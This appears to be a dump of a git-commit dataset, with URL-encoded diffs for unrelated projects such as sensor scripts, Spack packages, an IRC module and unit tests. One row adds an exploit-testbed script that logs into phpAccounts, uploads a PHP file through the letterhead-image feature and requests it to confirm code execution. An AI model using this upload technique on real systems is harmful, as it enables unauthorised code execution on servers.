commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
---|---|---|---|---|---|---|---|
bbc208548f0dd381f3045d24db3c21c4c8ee004e
|
Test all sensors at once
|
grovepi/scan.py
|
grovepi/scan.py
|
Python
| 0 |
@@ -0,0 +1,1456 @@
+import time%0Aimport grove_i2c_temp_hum_mini # temp + humidity%0Aimport hp206c # altitude + temp + pressure%0Aimport grovepi # used by air sensor and dust sensor%0Aimport atexit # used for the dust sensor%0Aimport json%0A%0A# Initialize the sensors%0At= grove_i2c_temp_hum_mini.th02()%0Ah= hp206c.hp206c()%0Agrovepi.dust_sensor_en()%0Aair_sensor = 0%0Agrovepi.pinMode(air_sensor,%22INPUT%22)%0Aatexit.register(grovepi.dust_sensor_dis)%0A%0Aret=h.isAvailable()%0Aif h.OK_HP20X_DEV == ret:%0A%09print %22HP20x_dev is available.%22 %0Aelse:%0A%09print %22HP20x_dev isn't available.%22%0A%0A%0Awhile True:%0A%09temp = h.ReadTemperature()%0A%09temp2 = t.getTemperature()%0A%09pressure = h.ReadPressure()%0A%09altitude = h.ReadAltitude()%0A%09humidity = t.getHumidity()%0A%09air_quality = %22--%22%0A%0A # try:%0A # %09# Get dust%0A%09%09# %5Bnew_val,lowpulseoccupancy%5D = grovepi.dustSensorRead()%0A%09%09# if new_val:%0A%09%09# %09print lowpulseoccupancy%0A # except IOError:%0A #%09 print (%22Error%22)%0A%0A%09try:%0A%09%09# Get air quality%0A%09%09air_quality = grovepi.analogRead(air_sensor)%0A%0A%09%09if air_quality %3E 700:%0A%09%09%09print (%22High pollution%22)%0A%09%09elif air_quality %3E 300:%0A%09%09%09print (%22Low pollution%22)%0A%09%09else:%0A%09%09%09print (%22Air fresh%22)%0A%0A%09%09print (%22air_quality =%22, air_quality)%0A%09except IOError:%0A%09%09print (%22Error%22)%0A%0A%09# Send result%0A%09data = %7B%0A%09%09%22air_quality%22: air_quality,%0A%09%09%22humidity%22: humidity,%0A%09%09%22temperature%22: (temp + temp2) / 2,%0A%09%09%22pressure%22: pressure,%0A%09%09%22altitude%22: altitude%0A%09%7D%0A%0A%09print json.dumps(data)%0A # with open('./json/hsk1.json', 'wb') as f:%0A%09%09# f.write(json.dumps(voc))%0A%09time.sleep(.5)
|
|
c834082c59abe6ae6d2e065e1a5afac2d399a612
|
Add unittests for the bridgedb.crypto module.
|
lib/bridgedb/test/test_crypto.py
|
lib/bridgedb/test/test_crypto.py
|
Python
| 0 |
@@ -0,0 +1,2114 @@
+# -*- coding: utf-8 -*-%0A#%0A# This file is part of BridgeDB, a Tor bridge distribution system.%0A#%0A# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 %[email protected]%3E%0A# please also see AUTHORS file%0A# :copyright: (c) 2013, Isis Lovecruft%0A# (c) 2007-2013, The Tor Project, Inc.%0A# (c) 2007-2013, all entities within the AUTHORS file%0A# :license: 3-Clause BSD, see LICENSE for licensing information%0A%0A%22%22%22Unittests for :mod:%60bridgedb.crypto%60.%22%22%22%0A%0Afrom __future__ import print_function%0Afrom __future__ import unicode_literals%0A%0Aimport os%0A%0Afrom twisted.trial import unittest%0Afrom bridgedb import crypto%0A%0A%0ASEKRIT_KEY = b'v%5Cx16Xm%5Cxfc%5Cx1b%7D%5Cx063%5Cx85%5Cxaa%5Cxa5%5Cxf9%5Cxad%5Cx18%5Cxb2P%5Cx93%5Cxc6k%5Cxf9'%0ASEKRIT_KEY += b'%5Cx8bI%5Cxd9%5Cxb8xw%5Cxf5%5Cxec%5Cx1b%5Cx7f%5Cxa8'%0A%0A%0Aclass CryptoTest(unittest.TestCase):%0A%0A def test_getKey_nokey(self):%0A %22%22%22Test retrieving the secret_key from an empty file.%22%22%22%0A filename = os.path.join(os.getcwd(), 'sekrit')%0A key = crypto.getKey(filename)%0A self.failUnlessIsInstance(key, basestring,%0A %22key isn't a string! type=%25r%22 %25 type(key))%0A%0A def test_getKey_tmpfile(self):%0A %22%22%22Test retrieving the secret_key from a new tmpfile.%22%22%22%0A filename = self.mktemp()%0A key = crypto.getKey(filename)%0A self.failUnlessIsInstance(key, basestring,%0A %22key isn't a string! type=%25r%22 %25 type(key))%0A%0A def test_getKey_keyexists(self):%0A %22%22%22Write the example key to a file and test reading it back.%22%22%22%0A filename = self.mktemp()%0A with open(filename, 'wb') as fh:%0A fh.write(SEKRIT_KEY)%0A fh.flush()%0A%0A key = crypto.getKey(filename)%0A self.failUnlessIsInstance(key, basestring,%0A %22key isn't a string! type=%25r%22 %25 type(key))%0A self.assertEqual(SEKRIT_KEY, key,%0A %22%22%22The example key and the one read from file differ!%0A key (in hex): %25s%0A SEKRIT_KEY (in hex): %25s%22%22%22%0A %25 (key.encode('hex'), SEKRIT_KEY.encode('hex')))%0A
|
|
8373de2daf5c44c069b9312ad3a3b21e2f5c21e3
|
Implement channel mode +l
|
txircd/modules/cmode_l.py
|
txircd/modules/cmode_l.py
|
Python
| 0 |
@@ -0,0 +1,1039 @@
+from twisted.words.protocols import irc%0Afrom txircd.modbase import Mode%0A%0Aclass LimitMode(Mode):%0A%09def checkSet(self, user, target, param):%0A%09%09intParam = int(param)%0A%09%09if str(intParam) != param:%0A%09%09%09return False%0A%09%09return (intParam %3E= 0)%0A%09%0A%09def commandPermission(self, user, cmd, data):%0A%09%09if cmd != %22JOIN%22:%0A%09%09%09return data%0A%09%09targetChannels = data%5B%22targetchan%22%5D%0A%09%09keys = data%5B%22keys%22%5D%0A%09%09removeChannels = %5B%5D%0A%09%09for channel in targetChannels:%0A%09%09%09if %22l%22 in channel.mode and len(channel.users) %3E= int(channel.mode%5B%22l%22%5D):%0A%09%09%09%09user.sendMessage(irc.ERR_CHANNELISFULL, channel.name, %22:Cannot join channel (Channel is full)%22)%0A%09%09%09%09removeChannels.append(channel)%0A%09%09%0A%09%09for channel in removeChannels:%0A%09%09%09index = targetChannels.index(channel)%0A%09%09%09targetChannels.pop(index)%0A%09%09%09keys.pop(index)%0A%09%09data%5B%22targetchan%22%5D = targetChannels%0A%09%09data%5B%22keys%22%5D = keys%0A%09%09return data%0A%0Aclass Spawner(object):%0A%09def __init__(self, ircd):%0A%09%09self.ircd = ircd%0A%09%0A%09def spawn(self):%0A%09%09return %7B%0A%09%09%09%22modes%22: %7B%0A%09%09%09%09%22cpl%22: LimitMode()%0A%09%09%09%7D%0A%09%09%7D%0A%09%0A%09def cleanup(self):%0A%09%09self.ircd.removeMode(%22cpl%22)
|
|
a24844a20634354167511163870438c36581c656
|
Add py-hpack (#19189)
|
var/spack/repos/builtin/packages/py-hpack/package.py
|
var/spack/repos/builtin/packages/py-hpack/package.py
|
Python
| 0 |
@@ -0,0 +1,614 @@
+# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other%0A# Spack Project Developers. See the top-level COPYRIGHT file for details.%0A#%0A# SPDX-License-Identifier: (Apache-2.0 OR MIT)%0A%0Afrom spack import *%0A%0A%0Aclass PyHpack(PythonPackage):%0A %22%22%22Pure-Python HPACK header compression%22%22%22%0A%0A homepage = %22https://github.com/python-hyper/hpack%22%0A url = %22https://pypi.io/packages/source/h/hpack/hpack-4.0.0.tar.gz%22%0A%0A version('4.0.0', sha256='fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095')%0A%0A depends_on('py-setuptools', type='build')%0A depends_on('py-wheel', type='build')%0A
|
|
5ed57df8d1e3b85bc27d5a834c9ec35b18055ba9
|
Create codility.py
|
codility.py
|
codility.py
|
Python
| 0.000003 |
@@ -0,0 +1,494 @@
+#lesson 1%0Adef solution(N):%0A bstr = dectoBin(N)%0A arr = %5B%5D%0A cnt = 0%0A for b in bstr:%0A if b == '0':%0A cnt = cnt + 1%0A if b != '0':%0A arr.append(cnt)%0A cnt = 0 %0A return getMax(arr)%0A%0Adef dectoBin(N):%0A bstr = %22%22%0A while N %3E 0:%0A bstr = str(N %25 2) + bstr%0A N = N // 2%0A return bstr%0A%0Adef getMax(arr):%0A max = arr%5B0%5D%0A for i in range(len(arr)):%0A if arr%5Bi%5D %3E max:%0A max = arr%5Bi%5D%0A return max%0A%0Asolution(0)%0A
|
|
955bca3beb7808636a586bed43c37e5f74fba17f
|
Add Weather class (use forecastio, geopy) - forecase(current/daily)
|
kino/functions/weather.py
|
kino/functions/weather.py
|
Python
| 0 |
@@ -0,0 +1,1562 @@
+# -*- coding: utf-8 -*-%0A%0Aimport datetime%0Aimport forecastio%0Afrom geopy.geocoders import GoogleV3%0A%0Afrom kino.template import MsgTemplate%0Afrom slack.slackbot import SlackerAdapter%0Afrom utils.config import Config%0A%0Aclass Weather(object):%0A%0A def __init__(self):%0A self.config = Config()%0A self.slackbot = SlackerAdapter()%0A self.template = MsgTemplate()%0A%0A geolocator = GoogleV3()%0A self.location = geolocator.geocode(self.config.weather%5B%22HOME%22%5D)%0A%0A api_key = self.config.weather%5B%22DARK_SKY_SECRET_KEY%22%5D%0A lat = self.location.latitude%0A lon = self.location.longitude%0A self.forecastio = forecastio.load_forecast(api_key, lat, lon)%0A%0A def read(self, when='current'):%0A if when == 'current':%0A self.__current_forecast()%0A elif when == 'daily':%0A self.__daily_forecast()%0A%0A def __daily_forecast(self):%0A daily = self.forecastio.daily()%0A%0A address = self.location.address%0A icon = daily.icon%0A summary = daily.summary%0A%0A attachments = self.template.make_weather_template(address, icon, summary)%0A self.slackbot.send_message(attachments=attachments)%0A%0A def __current_forecast(self):%0A current = self.forecastio.currently()%0A%0A address = self.location.address%0A icon = current.icon%0A summary = current.summary%0A temperature = current.temperature%0A%0A attachments = self.template.make_weather_template(address, icon, summary, temperature=temperature)%0A self.slackbot.send_message(attachments=attachments)%0A%0A%0A
|
|
1005f983774392306ca10e5fb12b59eeb63a88c4
|
add remote file inclusion exploit
|
framework/Exploits/OSVDB_82707_D.py
|
framework/Exploits/OSVDB_82707_D.py
|
Python
| 0.000001 |
@@ -0,0 +1,2463 @@
+%0A# Copyright 2013 University of Maryland. All rights reserved.%0A# Use of this source code is governed by a BSD-style%0A# license that can be found in the LICENSE.TXT file.%0A%0A%0Aimport framework %0Aimport time%0Aimport selenium.common.exceptions%0A%0Aclass Exploit (framework.Exploit):%0A attributes = %7B'Name' : %22OSVDB_82707D%22,%0A 'Description' : %22Upload and exec of php file using Letterhead img uplaod feature%22,%0A 'References' : %5B%5B'OSVDB','82707'%5D,%5B'http://www.osvdb.org/show/osvdb/82707'%5D%5D,%0A 'Target' : %22phpAccounts 0.5.3%22,%0A 'TargetLicense' : '',%0A 'Type' : %22EXEC%22,%0A 'VulWikiPage' : %22%22,%0A 'Privileged' : True%0A %7D%0A%0A def __init__(self, visible=False):%0A framework.Exploit.__init__(self, visible)%0A return%0A%0A%0A def setup(self, target_system_dir):%0A %0A self.logger.info(%22Creating payload file%22)%0A fd = file(%22/tmp/phpinfoexploit.php%22, 'w')%0A fd.write(%22%3C?php%5Cnphpinfo();%5Cn?%3E%22)%0A fd.close()%0A %0A return%0A%0A%0A def exploit(self):%0A driver = self.create_selenium_driver()%0A driver.get(%22http://127.0.0.1/phpaccounts/index.php%22)%0A%0A driver.get_element(by_xpath=%22//input%5B@name='Login_Username'%5D%22).send_keys(%[email protected]%22)%0A driver.get_element(by_xpath=%22//input%5B@name='Login_Password'%5D%22).send_keys(%22phpaccountspw21%22)%0A driver.get_element(by_xpath=%22//input%5B@value='Login'%5D%22).click()%0A driver.get_element(by_xpath=%22//frame%5B@name='leftFrame'%5D%22)%0A%0A driver.get(%22http://127.0.0.1//phpaccounts/index.php?page=tasks&action=preferences%22)%0A %0A driver.get_element(by_xpath=%22//input%5B@name='letterhead_image'%5D%22).send_keys(%22/tmp/phpinfoexploit.php%22)%0A%0A driver.get_element(by_xpath=%22//input%5B@value='Save Changes'%5D%22).click()%0A%0A %0A driver.cleanup()%0A return %0A%0A def verify(self):%0A driver = self.create_selenium_driver()%0A driver.get(%22http://127.0.0.1/phpaccounts/users/1/phpinfoexploit.php%22)%0A %0A try:%0A driver.get_element(by_xpath=%22//a%5B@href='http://www.php.net/'%5D%22)%0A driver.cleanup()%0A self.logger.info(%22Payload executed%22)%0A return True%0A except selenium.common.exceptions.NoSuchElementException:%0A self.logger.error(%22Payload failed to execute%22)%0A driver.cleanup()%0A %0A return False%0A%0A%0A
|
|
2c1b393c347ffcf24d9584be800378a1b77fa86d
|
add example to test error handling
|
flexx/ui/examples/errors.py
|
flexx/ui/examples/errors.py
|
Python
| 0 |
@@ -0,0 +1,1713 @@
+%22%22%22%0AApp that can be used to generate errors on the Python and JS side. These%0Aerrors should show tracebacks in the correct manner (and not crash the app%0Aas in #164).%0A%0ATo test thoroughly, you should probably also set the foo and bar%0Aproperties from the Python and JS console.%0A%22%22%22%0A%0Afrom flexx import app, event, ui%0A%0A%0Aclass Errors(ui.Widget):%0A %0A def init(self):%0A %0A with ui.VBox():%0A self.b1 = ui.Button(text='Raise error in JS property setter')%0A self.b2 = ui.Button(text='Raise error in JS event handler')%0A self.b3 = ui.Button(text='Raise error in Python property setter')%0A self.b4 = ui.Button(text='Raise error in Python event handler')%0A ui.Widget(flex=1) # spacer%0A %0A class Both:%0A %0A @event.prop%0A def foo(self, v=1):%0A return self.reciprocal(v)%0A %0A def reciprocal(self, v):%0A return 1 / v%0A %0A def raise_error(self):%0A raise RuntimeError('Deliberate error')%0A %0A class JS:%0A %0A @event.prop%0A def bar(self, v):%0A self.raise_error()%0A %0A # Handlers for four buttons%0A %0A @event.connect('b1.mouse_click')%0A def error_in_JS_prop(self, *events):%0A self.bar = 2%0A %0A @event.connect('b2.mouse_click')%0A def error_in_JS_handler(self, *events):%0A self.raise_error()%0A %0A @event.connect('b3.mouse_click')%0A def error_in_Py_prop(self, *events):%0A self.foo = 0%0A %0A @event.connect('b4.mouse_click')%0A def error_in_Py_handler(self, *events):%0A self.raise_error()%0A%0A%0Aif __name__ == '__main__':%0A m = app.launch(Errors)%0A app.run()%0A
|
|
331308eedd37628f5419001fc48fc5a328c1bab9
|
Add test_jsc
|
unnaturalcode/test_jsc.py
|
unnaturalcode/test_jsc.py
|
Python
| 0.00001 |
@@ -0,0 +1,1604 @@
+#!/usr/bin/python%0A# Copyright 2017 Dhvani Patel%0A#%0A# This file is part of UnnaturalCode.%0A# %0A# UnnaturalCode is free software: you can redistribute it and/or modify%0A# it under the terms of the GNU Affero General Public License as published by%0A# the Free Software Foundation, either version 3 of the License, or%0A# (at your option) any later version.%0A#%0A# UnnaturalCode is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the%0A# GNU Affero General Public License for more details.%0A#%0A# You should have received a copy of the GNU Affero General Public License%0A# along with UnnaturalCode. If not, see %3Chttp://www.gnu.org/licenses/%3E.%0A%0Afrom check_jsc_syntax import checkJSCSyntax%0Afrom compile_error import CompileError%0A%0Aimport unittest%0A%0AERROR_TEST = %22%22%22if (process.argv.length %3C 3)%0A%09console.error(%22not enough args%22);%0A%09process.exit(1);%0A%7D%0A%22%22%22%0A%0Aclass TestStringMethods(unittest.TestCase):%0A%0A%09def test_syntax_ok(self):%0A%09%09toTest = checkJSCSyntax('a=1+2')%0A%09%09self.assertTrue(toTest is None)%0A%09%09%0A%09def test_syntax_error(self):%0A%09%09toTest = checkJSCSyntax(ERROR_TEST)%0A%09%09self.assertTrue(isinstance (toTest%5B0%5D, CompileError))%0A%09%09self.assertEqual(toTest%5B0%5D.filename, 'toCheck.js')%0A%09%09self.assertEqual(toTest%5B0%5D.line, 4)%0A%09%09self.assertEqual(toTest%5B0%5D.column, None)%0A%09%09self.assertEqual(toTest%5B0%5D.functionname, None)%0A%09%09self.assertEqual(toTest%5B0%5D.text, 'Parser error')%0A%09%09self.assertEqual(toTest%5B0%5D.errorname, 'SyntaxError')%0A%09%0A%09%09%0Aif __name__ == '__main__':%0A unittest.main()%0A
|
|
a6495a05d4652beeefca9e383f5dd7b8fc4246d7
|
Create simple_fun_91:unique_digit_products.py
|
Solutions/simple_fun_91:unique_digit_products.py
|
Solutions/simple_fun_91:unique_digit_products.py
|
Python
| 0.999972 |
@@ -0,0 +1,115 @@
+from operator import mul%0A%0Adef unique_digit_products(a):%0A return len(%7Breduce(mul, map(int, str(x))) for x in a%7D)%0A
|
|
371545ecae0296f9274319c971be1378c3dafbbe
|
Add migration
|
services/migrations/0036_auto_20150327_1434.py
|
services/migrations/0036_auto_20150327_1434.py
|
Python
| 0.000002 |
@@ -0,0 +1,1298 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('services', '0035_auto_20150325_1637'),%0A %5D%0A%0A operations = %5B%0A migrations.AddField(%0A model_name='jiraupdaterecord',%0A name='feedback',%0A field=models.ForeignKey(to='services.Feedback', null=True, related_name='jira_records', blank=True),%0A preserve_default=True,%0A ),%0A migrations.AlterField(%0A model_name='jiraupdaterecord',%0A name='update_type',%0A field=models.CharField(max_length=22, choices=%5B('provider-change', 'Provider updated their information'), ('new-service', 'New service submitted by provider'), ('change-service', 'Change to existing service submitted by provider'), ('cancel-draft-service', 'Provider canceled a draft service'), ('cancel-current-service', 'Provider canceled a current service'), ('superseded-draft', 'Provider superseded a previous draft'), ('approve-service', 'Staff approved a new or changed service'), ('rejected-service', 'Staff rejected a new or changed service'), ('feedback', 'User submitted feedback')%5D, verbose_name='update type'),%0A preserve_default=True,%0A ),%0A %5D%0A
|
|
7d061e698788a60f0e3b59559961408015d891ed
|
Add first iteration of message_producer
|
utils/message_producer.py
|
utils/message_producer.py
|
Python
| 0.000051 |
@@ -0,0 +1,1109 @@
+import argparse%0Aimport pika%0A%0A%0Adef send_message(queue, body=None):%0A %22%22%22%0A Sends a message to the specified queue with specified body if applicable.%0A%0A :param queue: Name of queue.%0A :type queue: str%0A :param body: Content of message body in the form %22%7B'key': 'value'%7D%22.%0A :type body: str%0A %22%22%22%0A connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))%0A channel = connection.channel()%0A%0A channel.queue_declare(queue=queue)%0A%0A channel.basic_publish(exchange='', routing_key=queue, body=body)%0A print(%22 %5Bx%5D Message sent.%22)%0A print(%22 Queue: %7B0%7D%22.format(queue))%0A print(%22 Body: %7B0%7D%22.format(body))%0A%0A connection.close()%0A%0A%0Aif __name__ == '__main__':%0A parser = argparse.ArgumentParser(description='Send a message to the '%0A 'specified queue.')%0A parser.add_argument('-q', '--queue', required=True,%0A help='The destination of the message')%0A parser.add_argument('-b', '--body', help='The message body, if applicable.')%0A args = parser.parse_args()%0A%0A send_message(args.queue, args.body)
|
|
49614576524e74cb2e8eaa6656c1e86bf546c8e6
|
Create keystone_test.py
|
keystone_test.py
|
keystone_test.py
|
Python
| 0.000005 |
@@ -0,0 +1,1624 @@
+import keystoneclient.v2_0.client as ksclient%0Aimport novaclient.v1_1.client as nvclient%0Afrom novaclient import client as novaclient%0Aimport glanceclient%0Aimport os%0A%0Adef get_keystone_creds():%0A d = %7B%7D%0A d%5B'username'%5D = 'admin'%0A d%5B'password'%5D = 'password'%0A d%5B'auth_url'%5D = 'http://10.0.2.15:5000/v2.0/'%0A d%5B'tenant_name'%5D = 'demo'%0A return d%0A%0Adef get_nova_creds():%0A d = %7B%7D%0A d%5B'username'%5D = 'admin'%0A d%5B'api_key'%5D = 'password'%0A d%5B'auth_url'%5D = 'http://10.0.2.15:5000/v2.0/'%0A d%5B'project_id'%5D = 'demo'%0A return d%0A%0Aif __name__== %22__main__%22:%0A keystone_creds = get_keystone_creds()%0A keystone = ksclient.Client(**keystone_creds)%0A %0A nova_creds = get_nova_creds()%0A nova = nvclient.Client(**nova_creds)%0A %0A #if not nova.keypairs.findall(name=%22mykey%22):%0A # with open(os.path.expanduser('~/.ssh/id_rsa.pub')) as fpubkey:%0A # nova.keypairs.create(name=%22mykey%22, public_key=fpubkey.read())%0A %0A glance_endpoint = keystone.service_catalog.url_for(service_type='image',%0A endpoint_type='publicURL')%0A glance = glanceclient.Client('1',glance_endpoint, token=keystone.auth_token)%0A images = glance.images.list()%0A for one_image in images:%0A if one_image.name.find('ubuntu') %3E -1:%0A print one_image.name%0A image = nova.images.find(name=one_image.name)%0A flavor = nova.flavors.find(name=%22m1.small%22)%0A instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor)%0A#instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor, key_name=%22mykey%22)%0A
|
|
6789f2ea1862f4c30e8d60bd0b47640b7e5835c1
|
Add script to count labels in a data set
|
count_labels.py
|
count_labels.py
|
Python
| 0 |
@@ -0,0 +1,1059 @@
+%22%22%22Count HEEM labels in data set.%0A%0AUsage: python count_labels.py %3Cdir with train and test files%3E%0A%22%22%22%0Aimport codecs%0Afrom glob import glob%0Aimport numpy as np%0Aimport argparse%0Afrom collections import Counter%0A%0A%0Adef load_data(data_file):%0A data = %5Bln.rsplit(None, 1) for ln in open(data_file)%5D%0A%0A X_data, Y_data = zip(*data)%0A%0A return X_data, Y_data%0A%0A%0Adef count_labels(file_name, counter):%0A # load data set%0A X_data, Y_data = load_data(file_name)%0A%0A Y = %5Bs.split('_') for s in Y_data%5D%0A%0A for labelset in Y:%0A counter.update(labelset)%0A%0A del counter%5B'None'%5D%0A%0A return counter%0A%0A%0Aparser = argparse.ArgumentParser()%0Aparser.add_argument('input_dir', help='the directory where the input text '%0A 'files can be found.')%0Aargs = parser.parse_args()%0A%0Atrain_file = '%7B%7D/train_1.txt'.format(args.input_dir)%0Atest_file = '%7B%7D/test_1.txt'.format(args.input_dir)%0A%0Alabels = Counter()%0Alabels = count_labels(train_file, labels)%0Alabels = count_labels(test_file, labels)%0A%0Afor l, freq in labels.most_common():%0A print '%7B%7D%5Ct%7B%7D'.format(l, freq)%0A%0A
|
|
2c4a2368d2dc1c6ee910358fedd6e85cdf4f043a
|
Add test from jasmine-core
|
test/jasmine_core_test.py
|
test/jasmine_core_test.py
|
Python
| 0 |
@@ -0,0 +1,630 @@
+from pytest import raises%0Aimport pytest%0Aimport subprocess%0A%0Afrom jasmine_core import Core%0Aimport os%0Aimport pkg_resources%0A%0Anotwin32 = pytest.mark.skipif(%22sys.platform == 'win32'%22)%0A%0A@notwin32%0Adef test_js_files():%0A files = %5B%0A 'jasmine.js',%0A 'jasmine-html.js',%0A 'json2.js',%0A 'boot.js'%0A %5D%0A%0A assert Core.js_files() == files%0A%0A%0Adef test_css_files():%0A %22%22%22 Should return a list of css files that are relative to Core.path() %22%22%22%0A assert %5B'jasmine.css'%5D == Core.css_files()%0A%0A%0Adef test_favicon():%0A assert os.path.isfile(pkg_resources.resource_filename('jasmine_core.images', 'jasmine_favicon.png'))
|
|
7b5b4fdf8d5801d6e87d1b39f46a5f868aa07110
|
Add test
|
tests/cupy_tests/test_typing.py
|
tests/cupy_tests/test_typing.py
|
Python
| 0.000005 |
@@ -0,0 +1,135 @@
+import cupy%0A%0A%0Aclass TestClassGetItem:%0A%0A def test_class_getitem(self):%0A from typing import Any%0A cupy.ndarray%5BAny, Any%5D%0A
|
|
a9609a500a65cc0efb787f5d90e164bd6fa48c1a
|
Print the left view of a BST
|
leftViewofBST.py
|
leftViewofBST.py
|
Python
| 0.999984 |
@@ -0,0 +1,1075 @@
+class BST:%0A def __init__(self,val):%0A self.left = None%0A self.right = None%0A self.data = val%0A%0Adef insertToBst(root,value):%0A if root is None:%0A root = value%0A else:%0A if value.data %3C root.data:%0A if root.left is None:%0A root.left = value%0A else:%0A insertToBst(root.left, value)%0A else:%0A if root.right is None:%0A root.right = value%0A else:%0A insertToBst(root.right, value)%0A%0Adef leftView(root,level,currentLevel):%0A if not root:%0A return%0A else:%0A if (currentLevel%5B0%5D %3C level):%0A print root.data%0A currentLevel%5B0%5D = level%0A leftView(root.left, level+1, currentLevel)%0A leftView(root.right, level+1, currentLevel) %0A %0Atree = BST(5)%0AinsertToBst(tree, BST(4))%0AinsertToBst(tree, BST(6))%0AinsertToBst(tree, BST(2))%0AinsertToBst(tree, BST(1))%0AinsertToBst(tree, BST(7))%0AinsertToBst(tree, BST(8))%0AinsertToBst(tree, BST(9))%0AinsertToBst(tree, BST(10))%0A%0AleftView(tree, 1, %5B0%5D) # =%3E 5,4,2,1,9,10 ,O(n)%0A%0A
|
|
08e7103766ce684e849f23fac77792876fded586
|
fix helper to use the actual lines form ceph.conf
|
tests/functional/tests/mon/test_initial_members.py
|
tests/functional/tests/mon/test_initial_members.py
|
import pytest
uses_mon_initial_members = pytest.mark.skipif(
'mon_initial_members' not in pytest.config.slaveinput['node_config']['components'],
reason="only run in monitors configured with initial_members"
)
class TestMon(object):
def get_line_from_config(self, string, conf_path):
with open(conf_path) as ceph_conf:
ceph_conf_lines = ceph_conf.readlines()
for line in ceph_conf:
if string in line:
return line
@uses_mon_initial_members
def test_ceph_config_has_inital_members_line(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line
@uses_mon_initial_members
def test_initial_members_line_has_correct_value(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line == 'mon_initial_members = mon0'
|
Python
| 0 |
@@ -414,34 +414,40 @@
ine in ceph_conf
+_lines
:%0A
-
@@ -801,33 +801,33 @@
_config('mon
-_
+
initial
-_
+
members', ce
@@ -1183,33 +1183,33 @@
_config('mon
-_
+
initial
-_
+
members', ce
@@ -1261,33 +1261,33 @@
line == 'mon
-_
+
initial
-_
+
members = mo
|
5fad9d4fb60eb29d04d8d6a7fd967aad67ca28e2
|
Create __init__.py
|
pagination_bootstrap/__init__.py
|
pagination_bootstrap/__init__.py
|
Python
| 0.000429 |
@@ -0,0 +1 @@
+%0A
|
|
379d2953c90610a48eb80d1cabedb63b8f948813
|
Use `for_app` helper
|
thefuck/rules/fab_command_not_found.py
|
thefuck/rules/fab_command_not_found.py
|
from thefuck.utils import eager, get_closest
def match(command):
return (command.script_parts[0] == 'fab'
and 'Warning: Command(s) not found:' in command.stderr)
# We need different behavior then in get_all_matched_commands.
@eager
def _get_between(content, start, end=None):
should_yield = False
for line in content.split('\n'):
if start in line:
should_yield = True
continue
if end and end in line:
return
if should_yield and line:
yield line.strip().split(' ')[0]
def get_new_command(command):
not_found_commands = _get_between(
command.stderr, 'Warning: Command(s) not found:', 'Available commands:')
possible_commands = _get_between(
command.stdout, 'Available commands:')
script = command.script
for not_found in not_found_commands:
fix = get_closest(not_found, possible_commands)
script = script.replace(' {}'.format(not_found),
' {}'.format(fix))
return script
|
Python
| 0.000036 |
@@ -37,18 +37,43 @@
_closest
-%0A%0A
+, for_app%0A%0A%0A@for_app('fab')
%0Adef mat
@@ -100,58 +100,8 @@
urn
-(command.script_parts%5B0%5D == 'fab'%0A and
'War
@@ -146,17 +146,16 @@
d.stderr
-)
%0A%0A%0A# We
|
df777bf0771fdd8aadfbb26fe13b51692f4c161d
|
Add autogen package (#3542)
|
var/spack/repos/builtin/packages/autogen/package.py
|
var/spack/repos/builtin/packages/autogen/package.py
|
Python
| 0 |
@@ -0,0 +1,2398 @@
+##############################################################################%0A# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/llnl/spack%0A# Please also see the LICENSE file for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0A%0A%0Aclass Autogen(AutotoolsPackage):%0A %22%22%22AutoGen is a tool designed to simplify the creation and maintenance of%0A programs that contain large amounts of repetitious text. It is especially%0A valuable in programs that have several blocks of text that must be kept%0A synchronized.%22%22%22%0A%0A homepage = %22https://www.gnu.org/software/autogen/index.html%22%0A url = %22https://ftp.gnu.org/gnu/autogen/rel5.18.12/autogen-5.18.12.tar.gz%22%0A list_url = %22https://ftp.gnu.org/gnu/autogen%22%0A list_depth = 2%0A%0A version('5.18.12', '551d15ccbf5b5fc5658da375d5003389')%0A%0A variant('xml', default=True, description='Enable XML support')%0A%0A depends_on('[email protected]:', type='build')%0A%0A depends_on('[email protected]:2.0')%0A depends_on('libxml2', when='+xml')%0A%0A def configure_args(self):%0A spec = self.spec%0A%0A args = %5B%0A # %60make check%60 fails without this%0A # Adding a gettext dependency does not help%0A '--disable-nls',%0A %5D%0A%0A if '+xml' in spec:%0A args.append('--with-libxml2=%7B0%7D'.format(spec%5B'libxml2'%5D.prefix))%0A else:%0A args.append('--without-libxml2')%0A%0A return args%0A
|
|
cbbf9f34d08897358023078d81be3fa798601b02
|
add the repl.py
|
repl.py
|
repl.py
|
Python
| 0 |
